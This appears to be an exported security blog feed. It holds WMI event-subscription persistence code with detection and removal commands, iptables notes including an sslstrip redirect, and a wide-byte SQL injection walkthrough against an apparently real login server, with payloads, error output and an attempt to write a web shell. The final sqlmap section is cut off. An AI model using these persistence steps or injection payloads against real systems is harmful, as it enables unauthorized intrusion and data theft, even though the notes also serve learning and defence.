class="line">Query=<span class="variable">$Query</span>} -ErrorAction Stop</div><div class="line"><span class="comment"># create the CommandLineEventConsumer</span></div><div class="line"><span class="variable">$WMIEventConsumer</span>=<span class="built_in">Set-WmiInstance</span> -Class CommandLineEventConsumer -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$consumerName</span>;</div><div class="line">ExecutablePath=<span class="variable">$exePath</span>;</div><div class="line">CommandLineTemplate=<span class="variable">$exePath</span>}</div><div class="line"><span class="comment"># bind the filter to the consumer</span></div><div class="line"><span class="built_in">Set-WmiInstance</span> -Class __FilterToConsumerBinding -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line"><span class="keyword">Filter</span>=<span class="variable">$WMIEventFilter</span>;</div><div class="line">Consumer=<span class="variable">$WMIEventConsumer</span></div><div class="line">}</div></pre></td></tr></table></figure>
<h3 id="检测"><a href="#检测" class="headerlink" title="检测"></a>Detection</h3><blockquote>
<p>WMI subscriptions are sometimes used by malware to reset the browser home page; the same mechanism serves as file-less persistence for anything else.</p>
</blockquote>
<p>List filters, consumers and bindings</p>
<p>PowerShell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#List Event Filters</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter</div><div class="line"><span class="comment">#List Event Consumers</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="comment">#List Event Bindings</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding</div></pre></td></tr></table></figure></p>
<p>Using wmic (the namespace needs two leading backslashes)</p>
<p>wmic /namespace:\\root\subscription PATH __EventConsumer get /format:list<br>wmic /namespace:\\root\subscription PATH __EventFilter get /format:list<br>wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding get /format:list<br>wmic /namespace:\\root\subscription PATH __TimerInstruction get /format:list</p>
<p>Removal</p>
<p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter -Filter <span class="string">"Name='filtP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class CommandLineEventConsumer -Filter <span class="string">"Name='consP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter <span class="string">"__Path LIKE '%BotFilter82%'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose</div></pre></td></tr></table></figure></p>
<p>Using wmic. Without a WHERE clause these delete every instance of the class, including the SCM Event Log Filter/Consumer pair that stock Windows ships; restrict them, e.g. PATH __EventFilter WHERE Name="WMI_Mofbackdoor_Test_EF" DELETE</p>
<p>wmic /namespace:\\root\subscription PATH __EventConsumer delete<br>wmic /namespace:\\root\subscription PATH __EventFilter delete<br>wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding delete<br>wmic /namespace:\\root\subscription PATH __TimerInstruction delete</p>
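<p>An added example (not part of the original post): a Python triage script that correlates the three wmic listings above into one view per binding, skips the SCM Event Log binding that stock Windows ships (an allow-list assumption), flags consumers that execute code, and prints the matching PowerShell removal lines in the right order (binding, consumer, filter). The dumps embedded in the script are constructed samples shaped like wmic /format:list output (Key=Value lines, records separated by blank lines); on a suspect host, feed it the real output of the listing commands instead.</p>

```python
import re

# Constructed sample dumps, shaped like `wmic ... get /format:list` output. They contain
# the default SCM Event Log binding plus the test.mof subscription from this page.
BINDINGS_DUMP = """
Consumer=NTEventLogEventConsumer.Name="SCM Event Log Consumer"
DeliverSynchronously=FALSE
Filter=__EventFilter.Name="SCM Event Log Filter"

Consumer=CommandLineEventConsumer.Name="WMI_Mofbackdoor_Test_CL"
DeliverSynchronously=FALSE
Filter=__EventFilter.Name="WMI_Mofbackdoor_Test_EF"
"""
FILTERS_DUMP = """
EventNamespace=root\\cimv2
Name=SCM Event Log Filter
Query=select * from MSFT_SCMEventLogEvent
QueryLanguage=WQL

EventNamespace=Root\\Cimv2
Name=WMI_Mofbackdoor_Test_EF
Query=SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa "Win32_Process" And Targetinstance.Name = "notepad.exe"
QueryLanguage=WQL
"""
# One dump per concrete consumer class, e.g. `PATH CommandLineEventConsumer get /format:list`.
CONSUMER_DUMPS = {
    "CommandLineEventConsumer": """
CommandLineTemplate=calc.exe
ExecutablePath=
Name=WMI_Mofbackdoor_Test_CL
RunInteractively=FALSE
""",
    "ActiveScriptEventConsumer": "",
}

CODE_RUNNING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Stock Windows carries exactly this binding; assumption: treat it as known-good baseline.
BASELINE_BINDINGS = {("SCM Event Log Filter", "NTEventLogEventConsumer", "SCM Event Log Consumer")}
OBJECT_REF = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>.*)"$')


def parse_wmic_list(text):
    """Turn `wmic ... get /format:list` output into a list of {property: value} dicts."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def parse_ref(ref):
    """Split a relative object path such as __EventFilter.Name="X" into (class, name)."""
    match = OBJECT_REF.match(ref)
    if not match:
        raise ValueError(f"unexpected object path: {ref!r}")
    return match.group("cls"), match.group("name")


def triage(bindings_dump, filters_dump, consumer_dumps):
    """Correlate each binding with its filter and consumer; return every non-baseline binding."""
    filters = {f["Name"]: f for f in parse_wmic_list(filters_dump)}
    consumers = {}
    for cls, dump in consumer_dumps.items():
        for c in parse_wmic_list(dump):
            consumers[(cls, c["Name"])] = c
    findings = []
    for binding in parse_wmic_list(bindings_dump):
        _, filter_name = parse_ref(binding["Filter"])
        consumer_cls, consumer_name = parse_ref(binding["Consumer"])
        if (filter_name, consumer_cls, consumer_name) in BASELINE_BINDINGS:
            continue
        flt = filters.get(filter_name, {})
        con = consumers.get((consumer_cls, consumer_name), {})
        findings.append({
            "filter": filter_name,
            "query": flt.get("Query", "<filter object missing>"),
            "consumer_class": consumer_cls,
            "consumer": consumer_name,
            # what actually runs: a command line, an embedded script, or an executable
            "payload": con.get("CommandLineTemplate") or con.get("ScriptText")
                       or con.get("ExecutablePath") or "",
            "runs_code": consumer_cls in CODE_RUNNING_CONSUMERS,
        })
    return findings


def removal_commands(finding):
    """PowerShell lines that remove one subscription: binding first, then consumer, then filter."""
    ns = "root\\subscription"
    flt, cls, con = finding["filter"], finding["consumer_class"], finding["consumer"]
    return [
        f"Get-WmiObject -Namespace {ns} -Class __FilterToConsumerBinding -Filter \"__Path LIKE '%{flt}%'\" | Remove-WmiObject -Verbose",
        f"Get-WmiObject -Namespace {ns} -Class {cls} -Filter \"Name='{con}'\" | Remove-WmiObject -Verbose",
        f"Get-WmiObject -Namespace {ns} -Class __EventFilter -Filter \"Name='{flt}'\" | Remove-WmiObject -Verbose",
    ]


if __name__ == "__main__":
    for f in triage(BINDINGS_DUMP, FILTERS_DUMP, CONSUMER_DUMPS):
        flag = "RUNS CODE" if f["runs_code"] else "review"
        print(f"[{flag}] {f['filter']} -> {f['consumer_class']}:{f['consumer']} payload={f['payload']!r}")
        print("  query:", f["query"])
        for cmd in removal_commands(f):
            print("  ", cmd)
```

<p>Anything a consumer can reach (CommandLineTemplate, ScriptText, ExecutablePath) is shown next to the filter query, so a __InstanceCreationEvent on Win32_Process that launches calc.exe stands out immediately; a consumer with no matching dump is still reported, with an empty payload, rather than silently dropped.</p>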
<h3 id="WMI-Providers"><a href="#WMI-Providers" class="headerlink" title="WMI Providers"></a>WMI Providers</h3><p><a href="https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers" target="_blank" rel="external">https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers</a></p>
<p>Installing a provider (a .NET instrumentation assembly, the WMIServiceHost sample from the article above)<br>Installutil.exe WMIServiceHost.dll</p>
<p>wmic PATH win32_servicehost</p>
<p>Error handling </p>
<p>If installation fails, register the instrumentation assembly with regasm first (quote the path, which contains spaces)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">regasm "%systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll"</div></pre></td></tr></table></figure></p>
<h3 id="架构"><a href="#架构" class="headerlink" title="架构"></a>Architecture</h3><p>namespaces, classes, and objects</p>
<p>Persistent objects live in the CIM repository under %SystemRoot%\System32\wbem\Repository\ (OBJECTS.DATA, INDEX.BTR and the MAPPING*.MAP files), which holds WMI class instances, class definitions and namespace definitions; permanent event subscriptions can therefore be recovered from these files during forensic analysis.</p>
<blockquote>
<p>Note<br>1. The CIM repository can store arbitrary data (for example in a property of a custom static class, as with Win32_EvilClass above).<br>2. It can serve as a C2 channel: one side writes data into a WMI object, the other reads it remotely over DCOM or WinRM.<br>3. Custom providers can be created. </p>
</blockquote>
]]></content>
</entry>
<entry>
<title><![CDATA[Iptables]]></title>
<url>/2016/09/19/Iptables/</url>
<content type="html"><![CDATA[<p>Chains (built-in)</p>
<ol>
<li>PREROUTING (before the routing decision; nat DNAT rules live here)</li>
<li>INPUT (packets addressed to the local host)</li>
<li>FORWARD (packets routed through this host)</li>
<li>OUTPUT (locally generated packets)</li>
<li>POSTROUTING (after the routing decision; nat SNAT/MASQUERADE rules live here)</li>
</ol>
<p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p>
<a id="more"></a>
<p>List rules (not the routing table; -n skips DNS lookups, -v adds counters and interfaces, --line-numbers shows the positions used by -D/-I/-R)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -L -n -v</div><div class="line">iptables -L -n --line-numbers</div><div class="line">iptables -t nat -vnL</div></pre></td></tr></table></figure></p>
<p>Set a chain's default policy<br>iptables -P INPUT (DROP|ACCEPT): DROP = deny by default, ACCEPT = allow by default. Switch INPUT to DROP only after an ACCEPT rule for ESTABLISHED,RELATED traffic and for your management port is in place, or a remote SSH session is cut off.</p>
<p>Flush chains<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -t nat -F              # flush every chain of the nat table</div><div class="line">iptables -t nat -F PREROUTING   # flush one chain only</div><div class="line">iptables -F                     # flush the filter table (the default table)</div></pre></td></tr></table></figure></p>
<p>Create a user-defined chain<br>iptables -N NEWCHAINNAME</p>
<p>-s: match the source address; give an IP, a network (IP/MASK) or 0.0.0.0/0, not a host name (a name would be resolved once, when the rule is added)<br>IP | IP/MASK | 0.0.0.0/0.0.0.0<br>The address can be negated with "!" (everything except that IP)<br>-d: match the destination address<br>-p: match the protocol (normally tcp, udp or icmp)<br>-i eth0: packets arriving on this interface<br>Inbound interface matches belong on INPUT, FORWARD and PREROUTING<br>-o eth0: packets leaving through this interface<br>Outbound interface matches belong on OUTPUT, FORWARD and POSTROUTING</p>
<p>--dport 22: destination port<br>--sport 22: source port<br>-p tcp: protocol (required before --dport/--sport)<br>-j ACTION: DROP / REJECT / ACCEPT / DNAT (destination address translation) / SNAT (source address translation) / MASQUERADE / REDIRECT</p>
<p>Allow 192.168.6.1 to reach the local SSH service (together with the next rule it becomes the only host allowed)<br><code>iptables -t filter -A INPUT -s 192.168.6.1 -p tcp --dport 22 -j ACCEPT</code></p>
<p>Drop access to port 22 from every address except 192.168.6.1<br><code>iptables -A INPUT ! -s 192.168.6.1 -p tcp --dport 22 -j DROP</code></p>
<p>Delete rule 4 of INPUT by position (delete)<br><code>iptables -D INPUT 4</code></p>
<p>Delete rule 1 of FORWARD<br><code>iptables -D FORWARD 1</code></p>
<p>Stateful filtering: admit only NEW and ESTABLISHED connections inbound and only ESTABLISHED traffic outbound (conntrack state matching, as in the --ctstate rules further down). A reverse-connect (callback) trojan then cannot open a new outbound connection to its controller, which contains the most common implant pattern.</p>
<p>NAT: masquerade a LAN behind this host's outbound interface (requires net.ipv4.ip_forward=1)<br><code>iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE</code></p>
<p>DNAT: behind the NAT, redirect traffic for 192.168.10.18 port 80 to the internal host 172.16.100.2<br><code>iptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2</code></p>
<p>Redirect inbound port 80 to a local port (for example an sslstrip listener on a MITM box)<br><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <sslstrip listenPort></code></p>
<p>DNAT port forwarding (the FORWARD chain must also permit the forwarded traffic)<br><code>iptables -t nat -A PREROUTING -d <public IP> -p TCP --dport 80 -j DNAT --to-destination 10.31.2.1</code><br><code>iptables -t nat -A PREROUTING -i eth1 -p udp --dport 53 -j DNAT --to 192.168.6.1</code></p>
<p>Delete a nat PREROUTING rule by number<br><code>iptables -t nat -D PREROUTING <num></code></p>
<p>Insert as rule 3 of INPUT (the current rule 3 moves to position 4; -I without a number inserts at the top)<br><code>iptables -I INPUT 3 -p tcp --dport 21 -j ACCEPT</code></p>
<p>Replace rule 3 of INPUT (the whole rule is replaced, so repeat any match options you want to keep)<br><code>iptables -R INPUT 3 -j DROP</code></p>
<p>Catch-all rule: an unconditional ACCEPT appended to INPUT matches everything not handled earlier, which disables filtering for those packets<br><code>iptables -A INPUT -j ACCEPT</code></p>
<p>Save (iptables-save prints the ruleset; on CentOS/RHEL the init script loads /etc/sysconfig/iptables at boot)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables-save</div><div class="line">/etc/sysconfig/iptables</div></pre></td></tr></table></figure></p>
<p>Restore<br><code>iptables-restore</code> (reads a saved ruleset from standard input)</p>
<p>Per-source ICMP rate limit with the recent module: the first rule (placed as rule 2 here with -R) drops a packet whose source already has 3 recorded hits within the last 10 seconds, and --update also records the dropped packet, so a steady flood stays blocked until it pauses; anything that gets past it reaches the --set rule, which records the hit and accepts. Net effect: 3 ICMP packets per 10 seconds per source. The --update rule must precede the --set rule.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables -R INPUT 2 -p icmp -m recent --update --seconds 10 --hitcount 3 --name PINGTEST --rsource -j DROP</div><div class="line"> -A INPUT -p icmp -m recent --set --name PINGTEST --rsource -j ACCEPT</div></pre></td></tr></table></figure></p>
<p>Cap concurrent connections from a single IP to port 80 at 10 (connlimit rejects the 11th and beyond)<br><code>iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j REJECT</code></p>
<p>Rate-limit new TCP connections: as written, an average of 60 per second with a burst of 20 (a 15-per-minute limit would be --limit 15/m). Note that limit keeps one token bucket for the rule, shared by all sources, not one per IP; use hashlimit with --hashlimit-mode srcip for a per-IP limit.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT</div><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -j DROP</div></pre></td></tr></table></figure></p>
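<p>An added example, not from the original post: a Python model of the two rate-limiting mechanisms used in the recent-module rule pair and the limit rule pair above, run over constructed packet traces. RecentTable models the recent module's per-source hit list (the kernel's fixed stamp-ring size is ignored, an assumption), and TokenBucket models the single bucket that limit keeps per rule. It shows the 3-per-10-seconds behaviour of the ICMP rules, that dropped packets keep refreshing the window so a flood never recovers until it stops, and that a burst of 20 SYNs passes before the 60/s average applies to every source at once.</p>

```python
from collections import defaultdict, deque


class RecentTable:
    """Simplified model of the xt_recent list: per-source timestamps of recorded hits.
    Assumption: the kernel's fixed-size stamp ring (ip_pkt_list_tot) is ignored."""

    def __init__(self):
        self.hits = defaultdict(deque)

    def set(self, src, now):
        # `--set`: add the source (or refresh it) and record one hit
        self.hits[src].append(now)

    def update(self, src, now, seconds, hitcount):
        """`--update --seconds S --hitcount N`: true when the source is listed and at least N
        hits fall within the last S seconds; a match also records the current packet as a hit."""
        if src not in self.hits:
            return False
        recent = sum(1 for t in self.hits[src] if now - t < seconds)
        if recent >= hitcount:
            self.hits[src].append(now)
            return True
        return False


def icmp_verdicts(packets, seconds=10, hitcount=3):
    """The two rules from the page, in order: `-m recent --update --seconds 10 --hitcount 3 -j DROP`
    followed by `-m recent --set -j ACCEPT`. packets: iterable of (source, time_in_seconds)."""
    table = RecentTable()
    verdicts = []
    for src, now in packets:
        if table.update(src, now, seconds, hitcount):
            verdicts.append("DROP")
        else:
            table.set(src, now)
            verdicts.append("ACCEPT")
    return verdicts


class TokenBucket:
    """Model of `-m limit --limit R/s --limit-burst B`: one bucket for the whole rule."""

    def __init__(self, rate_per_s, burst):
        self.rate, self.burst = float(rate_per_s), float(burst)
        self.tokens, self.last = float(burst), 0.0

    def allow(self, now):
        # refill at the configured rate, capped at the burst size, then spend one token if present
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def new_connection_verdicts(arrival_times, rate_per_s=60, burst=20):
    """The rules from the page: NEW connections pass while the bucket has tokens, the rest hit
    the DROP rule. Because `limit` is global, every source shares this one bucket."""
    bucket = TokenBucket(rate_per_s, burst)
    return ["ACCEPT" if bucket.allow(t) else "DROP" for t in arrival_times]


if __name__ == "__main__":
    # constructed trace: one host pings five times in quick succession, goes quiet, pings again
    pings = [("10.0.0.5", t) for t in (0, 1, 2, 3, 4, 16)]
    print(icmp_verdicts(pings))   # ['ACCEPT', 'ACCEPT', 'ACCEPT', 'DROP', 'DROP', 'ACCEPT']
    # constructed trace: 25 SYNs at the same instant, then one a second later
    syns = [0.0] * 25 + [1.0]
    v = new_connection_verdicts(syns)
    print(v.count("ACCEPT"), v[20], v[-1])   # 21 DROP ACCEPT
```

<p>To see the per-source versus global difference, feed new_connection_verdicts() SYNs from many sources: all of them share the 20-token burst, whereas icmp_verdicts() keeps a separate window per source address, which is what --rsource asks for.</p>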
<p>Block a single IP<br><code>iptables -I INPUT -s 121.69.131.144 -j DROP</code></p>
<p>CentOS<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">/sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT #open port 8080</div><div class="line">/etc/rc.d/init.d/iptables save #save the configuration</div><div class="line">/etc/rc.d/init.d/iptables restart #restart the service</div><div class="line">/etc/init.d/iptables status</div></pre></td></tr></table></figure></p>
]]></content>
</entry>
<entry>
<title><![CDATA[PHP wide-byte error-based injection]]></title>
<url>/2015/07/04/PHP%E5%AE%BD%E5%AD%97%E8%8A%82%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="注入测试"></a>Injection testing</h4><p>Injection point: single quotes are escaped<br>POST <a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a><br>PASSWORD=1111&UNAME=admin</p>
<h5 id="TESTING01-测试宽字节"><a href="#TESTING01-测试宽字节" class="headerlink" title="TESTING01 测试宽字节"></a>TESTING01: testing for wide bytes</h5><p><code>PASSWORD=1111&UNAME=1%bf'</code></p>
<p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1縗’’’ at line 1<br>SQL statement: <code>SELECT * from USER where USER_ID='1縗'' or BYNAME='1縗''</code><br>File: D:/myoa/webroot/logincheck.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">Note</div><div class="line">To block SQL injection PHP introduced magic_quotes_gpc; when enabled it prefixes single quotes, double quotes, backslashes and NUL with a backslash. The escaping works byte by byte, so when the database connection uses the GBK character set the backslash can be absorbed into a two-byte character: a wide-byte injection.</div><div class="line">escaped quote: \'</div><div class="line">PASSWORD=123456&UNAME=admin%bf\'</div><div class="line"> ---------------------</div><div class="line">|\ ==> %5C |</div><div class="line">|MySQL decodes %bf%5c as the GBK character 縗, leaving the ' unescaped |</div><div class="line"> ---------------------</div></pre></td></tr></table></figure>
<h5 id="TESTING02-闭合语句"><a href="#TESTING02-闭合语句" class="headerlink" title="TESTING02 闭合语句"></a>TESTING02: closing the quoted string</h5><p><code>PASSWORD=123456&UNAME=admin%bf%5C'</code></p>
<p>SQL statement: <code>SELECT * from USER where USER_ID='admin縗'' or BYNAME='admin縗''</code></p>
<p>The application's own trailing quote now breaks the statement, so we comment out the rest with # (%23).</p>
<p><code>PASSWORD=123456&UNAME=admin%bf'%23</code></p>
<p>SQL statement: <code>SELECT * from USER where USER_ID='admin縗'#' or BYNAME='admin縗'#'</code></p>
<h5 id="TESTING03-处理插入语句报错"><a href="#TESTING03-处理插入语句报错" class="headerlink" title="TESTING03 处理插入语句报错"></a>TESTING03: dealing with the INSERT error</h5><p>The login SELECT now executes without error, but the login-log INSERT that follows it fails with a syntax error.</p>
<p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ at line 1<br>SQL statement: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗'#','2015-09-04 13:41:11','27.211.123.74','10','USERNAME=admin縗'#')</code><br>File: D:/myoa/webroot/logincheck.php</p>
<p>Use the comment to complete the INSERT's VALUES list ourselves<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4)%23</code></p>
<p>#1136: Column count doesn’t match value count at row 1<br>SQL statement: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗',2,3,4)#','2015-09-04 13:50:55','27.211.123.74','10','USERNAME=admin縗',2,3,4)#')</code><br>File: D:/myoa/webroot/logincheck.php</p>
<p>Column count mismatch: the VALUES list is one value short of the five columns; adding one more value removes the error.</p>
<p>PAYLOAD<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4,5)%23</code></p>
<h4 id="尝试写SHELL"><a href="#尝试写SHELL" class="headerlink" title="尝试写SHELL"></a>Attempting to write a shell</h4><p>Determine the column count<br><code>PASSWORD=123456&UNAME=admin%bf' order by 1%23</code></p>
<p>Use an impossibly high column index to confirm that errors are reported<br><code>PASSWORD=123456&UNAME=admin%bf' order by 100%23</code></p>
<p>#1054: Unknown column ‘100’ in ‘order clause’<br>SQL statement: <code>SELECT * from USER where USER_ID='admin縗' order by 100#' or BYNAME='admin縗' order by 100#'</code><br>File: D:/myoa/webroot/logincheck.php</p>
<p>No error at 77 columns (77 of them!)<br><code>PASSWORD=123456&UNAME=admin%bf' order by 77%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 123456,admin縗%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,...,74,75,76,77 into outfile "D:/myoa/webroot/r1.txt"%23</code><br>Returns a blank page (the database user probably lacks the FILE privilege, the directory is not writable, or secure_file_priv restricts the output path)</p>
<h4 id="sqlmap添加-自动跑库"><a href="#sqlmap添加-自动跑库" class="headerlink" title="sqlmap添加*自动跑库"></a>sqlmap添加*自动跑库</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div 
class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div 
class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div 
class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div 
